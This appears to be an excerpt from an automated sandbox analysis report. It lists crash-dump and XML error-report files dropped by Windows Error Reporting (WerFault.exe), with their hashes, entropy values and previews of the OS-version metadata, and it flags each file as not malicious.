                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:56 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):63010
                                                                            Entropy (8bit):2.2444467027294777
                                                                            Encrypted:false
                                                                            SSDEEP:384:uynlBkltk1H9hgUEGsQzwc+cQa9m7XjUm:llB+QdhgNG/wcIaX
                                                                            MD5:97D41825E79DFD080E5F4FA105AED92C
                                                                            SHA1:968A05669E7D4A8CF3DF506695289865C10DF172
                                                                            SHA-256:2AEF20E9B1B0AABD116BA3D3AEEB21477BFD556433CDE1E3BBF8100DA19CFD30
                                                                            SHA-512:5625D03C95D29904FAC1A5B3D28EEA086D4F21AF461EE02B3788366C9756278A3D5BD654BA5A615AA403FBD32224E86FF484C6C6C2986EAD914C5200B15655C5
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7165751716228654
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBZ61JuYUMaAjAbpB089bV5sfInm:R6lXJ961JuYdaAjAVVSfV
                                                                            MD5:2DA117A079F416B3EE2C904C6014EC35
                                                                            SHA1:51975C894ED44200663C67E2098B0F055F5740B0
                                                                            SHA-256:CAA9C7119882AEEB013838168C50C72A9549B1F9C5E8FEFCA44BE41E3D8F2F74
                                                                            SHA-512:88CC4DA6080F566A63F127DB8EBA235D833688AF96FA42A11014E6B1F803AD2CD1957F49898367D3321CA24078B401E3A38F7CA4A9000CB064EEC1E4F61C0AF3
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.485245416337371
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VY+5Ym8M4JKTBFy+q8v+TGh0B9ned:uIjfrI7Cj67VFoJPKt0B9ned
                                                                            MD5:14D6C143D5B57C61DA524D54E9F69D2E
                                                                            SHA1:A1E1BB90389EF6D0A28242A6B258C1714762614D
                                                                            SHA-256:615AFBBA02797EFBAA2DFC13D412F7BB4C5E622AC393978A1BEACEE12AFA17DC
                                                                            SHA-512:ABF07D77C933DDECCA24E89F5736C59487C9A12546BBE62A255992E6573BF88100E10E9CE454E96B436DD7F02501A7F5CAD060A44301C646A4AE70ACCB6E33E4
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:57 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64474
                                                                            Entropy (8bit):2.254615572925628
                                                                            Encrypted:false
                                                                            SSDEEP:192:dGyuX6tlLXFkltceJmO2gtgZEyWBKhsSEPM9dB5OL2PvAaklr+1XLY3hyCHW769Q:4ynlBkltcehgGtKhsSEkZ59oa9mHoEM
                                                                            MD5:A9C32A3AF1825093371320E62490316F
                                                                            SHA1:C9A30F3EC27C27EE98392B2FBA4A58CBC2205EB8
                                                                            SHA-256:76ECD2282787142E76C5DECDA9A84C66E892574E4C0C40ACECE15CA4C1F3FC71
                                                                            SHA-512:81B6AE0E93BF48422F2F9111A1C19A92BD0856691176E56813DC9241F74F06694439F66485D60D1CBE52BDF4AB5A67C247B1DAD12DB3065013EDCCF4B59194A2
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.717806395746615
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBc6KJSYUc0pBw89bM5sfgckm:R6lXJ46KJSYNOMSff
                                                                            MD5:8911940252109DB1E36074B481570F4C
                                                                            SHA1:BA79844360199ECCC873537DCF2D4970DB062132
                                                                            SHA-256:013D5863AD189872F753C0454D89694D50EA2420EF1A311E02628672414D7932
                                                                            SHA-512:DAB829159E334DD63E6FAE2E3FE52C84165993E8295C9414B80E961FFC1C0C8F990BD0860223944A4E1FD92B71B90E41C7586CCDFA35BE4FBCE08D7D931579DC
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.487112423625816
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYN5Ym8M4JKTJF0+q8v+Tuh0B9ned:uIjfrI7Cj67VaoJdKF0B9ned
                                                                            MD5:E50735DB8360C6B976F809A9670A796E
                                                                            SHA1:03911A000294340600972A11056F4C68A2D594FC
                                                                            SHA-256:AD50517FF5EE59D14D7D1407F04B643D538E03514B4162781F36D1D2E422DF0D
                                                                            SHA-512:9789022C8A49C3B506670EE237C9E84736244752573AC2186F7B2EA171AE8473F630F88AAF8236A3E405A01F319D446E05FBA141D4A21E9D98AD63AC0407FF08
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:43 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):62618
                                                                            Entropy (8bit):2.2377366918151598
                                                                            Encrypted:false
                                                                            SSDEEP:192:biyuX6tlLXFkltsk3RmO2gtg+XGtWGsyVFwouBd8c2bDaklr+1XLY3hyCHW76fFm:2ynlBkltBhgcGRs2wPdwa9mbxqYm
                                                                            MD5:6505B3CBC8924D69048EBBB9F6AC7B42
                                                                            SHA1:97B04D165A4E1B43DF6960D8CFA8BC814DF501B6
                                                                            SHA-256:A042C613A8E526105C957BDBF44866185C9D2675E241BBA7147D236D24A26CEC
                                                                            SHA-512:E6897A40F70FB450F71B27DA7D8B2ED363202CC9D477AF23C77B1C1265B6AF682790D9C67EA9CA7A10F660C329E4B0B7D0DE2DE308E0FD15FF58A9ADC593BF8B
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.716950094441577
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBjg6psguYUMaAjAbpB089bJ5sf2Zjm:R6lXJPg6psJYdaAjAVJSf9
                                                                            MD5:C01EF1B066245D16F7D3B043D5331DDB
                                                                            SHA1:EE3094F71B014FB515EC4BAD3BC056D12979976F
                                                                            SHA-256:AF51023306184607867D7DE060608DFA3EB9E9062CF57EE69B7D88983DA4B0A9
                                                                            SHA-512:F0C6350342256E28CD44308512DF4EE168F2F9DDDBA5004A69699E6422692AA427431513D24DA435231505481CFD00774073B4EAFFBFF7F0B1CB62CA7D767BCE
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.484726205992288
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYyFYm8M4JKTBFi+q8v+TGh0B9ned:uIjfrI7Cj67VH0JLKt0B9ned
                                                                            MD5:B3AEE8C56D03FFC924DD53EFF008D21A
                                                                            SHA1:C3BD33B8C4838621B30F2B4817EE35F4FE1DEBFF
                                                                            SHA-256:320B98F93F9EBB298DD998CBF0B23C5AEEF2448187B8C0355711D0CC5C17DAB2
                                                                            SHA-512:4024C1153BFBFAD85D3803DD87DAF0ADB97425FDA0394A358FD77DBB211F81988C206608EACF1911C0E2C343DF2870F9F6FBD001904C54DB6C446BC2A3F26988
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:44 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64082
                                                                            Entropy (8bit):2.24873703572224
                                                                            Encrypted:false
                                                                            SSDEEP:192:Q7yuX6tlLXFkltBjemO2gtgCEyWN6hsSEPr9KBYG42fqDaklr+1XLY3hyCHW76aF:2ynlBkltBihgbx6hsSEjmYasa9mqNk+
                                                                            MD5:BD9670AB1386E776FEFE58ECA0102360
                                                                            SHA1:3F62B406A4F371D7FFE90D5FE21FC08F01637C0D
                                                                            SHA-256:C15BADE0117805A7A516DE46C7AE741F25E9C4B09D4060B2FC468C9B82D0F512
                                                                            SHA-512:489F7B899C66EAF4CC01CE448CC8A696309C39182EBFB58419539E8E51E31634806EDBA4687A4AACA6B842BD11EDE2A4B36598B632E3DB2A2113D8354F8851C3
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):6430
                                                                            Entropy (8bit):3.7170445130747782
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVB56hszuYUc0pBG89bf5sfiVm:R6lXJd6hsaYNMfSfJ
                                                                            MD5:856A5FEAE0B9CC724B7893A0A66169B9
                                                                            SHA1:E2182993B400E86FB300FEE1A61A79C441E433C0
                                                                            SHA-256:71C9B8670F62E0FDDDD21169D1D88DC27C59CE4AD2A98A39A9E78AAB3394EEEA
                                                                            SHA-512:25213543C2CBD3ED43D02DD6B662581992153F4CD9CCD70B644FA7CDCF40394892EF93C935E0704F6B2EFF7A46830F77D1F55F592BC6EF0EBDE215BDCA8E0036
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.487714946323808
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VY8vYm8M4JKTJFS+q8v+Tuh0B9ned:uIjfrI7Cj67VjyJDKF0B9ned
                                                                            MD5:656E4108B078A98B521AD6C2ED31D8D3
                                                                            SHA1:A3269D853F29F3051C4F3FAAC6E3849A207430C3
                                                                            SHA-256:9AD47FA5BEDFDEAE7AE4610FC19F7E4D038A0FF760A6C0F992AE26C817C8BCE1
                                                                            SHA-512:74ACBE472E0875B7FD5FCF4E230B16BC78EB68AD1B586CEFE0DA8C2804F8AB5970E2E247FB908159946F1A2B3FCF72FF114E02961AF1878BE7307CE32A368DDD
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:34 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):58092
                                                                            Entropy (8bit):2.2805011266538715
                                                                            Encrypted:false
                                                                            SSDEEP:192:aUY7dXNUeXQIP78SYmO2gtpwiHWisKOhdU2fSZLak9j+1XLY3hyCHW76EoBponE7:fY7v8IP78SchqiTsKOhd0VapmeoUs
                                                                            MD5:E47DCCD37400E945A14DA04A43B20732
                                                                            SHA1:CAE3A73F97058AD6E701641614FF8FA03AF4ADBA
                                                                            SHA-256:2B9316E124F05CB8577C1890DC99D7DC2030EB6A759E44746DFC153138E16D72
                                                                            SHA-512:6AA408FC617F1B754EFDCDEF828FC193916B49840F5425EA0AE5D01FBA90B25984A0DE1A05A8F41A570A1866266F69387F153E4B412EEF05B526955C0EBB324D
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8436
                                                                            Entropy (8bit):3.6929282118121796
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBB6f6YhDl6rgmfUc0pBB89bh5sfzLm:R6lXJF6f6Yll6rgmfNNhSf+
                                                                            MD5:D383770D0B845F79CF3E2C0B8C2616A2
                                                                            SHA1:5D89F22FFF151BF8FAA9B6794CD9762F034AFB7D
                                                                            SHA-256:53C58C3FC0DA8B4CD0CB1F22548656CC44465180EE94CC39CCD2BF6CA2B26190
                                                                            SHA-512:936DBE58E0C67BEC8EF17A9111D680582A39C5DF138359BB06B066A74BACA3CF13FBF6184F0ACA9F0AAA30F86C7D5E6A5E484BA55C42AF17B6DEB1D599BF730D
                                                                            Malicious:false
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4765
                                                                            Entropy (8bit):4.4852100672899935
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsZJg77aI9wjLWpW8VYhYm8M4JKTJF7P+q8v+Tuh0B9ned:uIjfrI7Cj67VVJ+KF0B9ned
                                                                            MD5:1BCBE9453C15B599B320B4E54A7C1837
                                                                            SHA1:C1276A1E72C8FC0B1C89EC6CFC005BB25B9BF629
                                                                            SHA-256:4A366418836040B88220450433ACC03B2A9FB223DF78521A6561982BECFC948B
                                                                            SHA-512:3568B1F5574C408325E602E87BEAFC6FD673C05B75415B1CCAC00B4664D436552748A8FFEAE8ED3AEFC014106452164F4534C16CB541D4E941230795B654EB0C
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="634053" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:30:35 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):64068
                                                                            Entropy (8bit):2.267709531496996
                                                                            Encrypted:false
                                                                            SSDEEP:384:/SWb4rn40hQCpyhsSEeCTiqMjxasmHtwBc:/5biXhVpyhCiftaABc
                                                                            MD5:206C58DE34C3FDC57B9F16EA2CE714F3
                                                                            SHA1:CF66FAE337DA57A9EE28FB716F98BA9F0C9C525F
                                                                            SHA-256:28162539B191062B7B465A73A66BDC77E18022C58C7A124B185C108E51E541D1
                                                                            SHA-512:A0023C8049DF6C36EE355A03ED02C72C96E5ECCB19181F8A768188BC142EF5AA666AD36E829113FE9BFE39A1EFD27AF1B275C7E1749BE59FCABC417305B7C72E
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8440
                                                                            Entropy (8bit):3.6942226235416085
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJVBw60XoFL6YhU6OgmfUc0pBa89bY5sfiIm:R6lXJ060XoJ6YC6OgmfNwYSfM
                                                                            MD5:89F5F2FFCBEB2F2E936E8FBE94254259
                                                                            SHA1:88DA26897ACC687F10133902D94B78F2FF654FB0
                                                                            SHA-256:BAED54AF90DB2E1EABA04E3ECF5C9C8741D508AC48ED2523992E6540D819E510
                                                                            SHA-512:A4E17523AB95C312024C922FFE5CFE45C76F91D56882F4E32859E57A1B50FB9652359C2A2D410A5CCC2F64C955B2FC7D0C61823AAC0F534471AE6D881281A27B
                                                                            Malicious:false
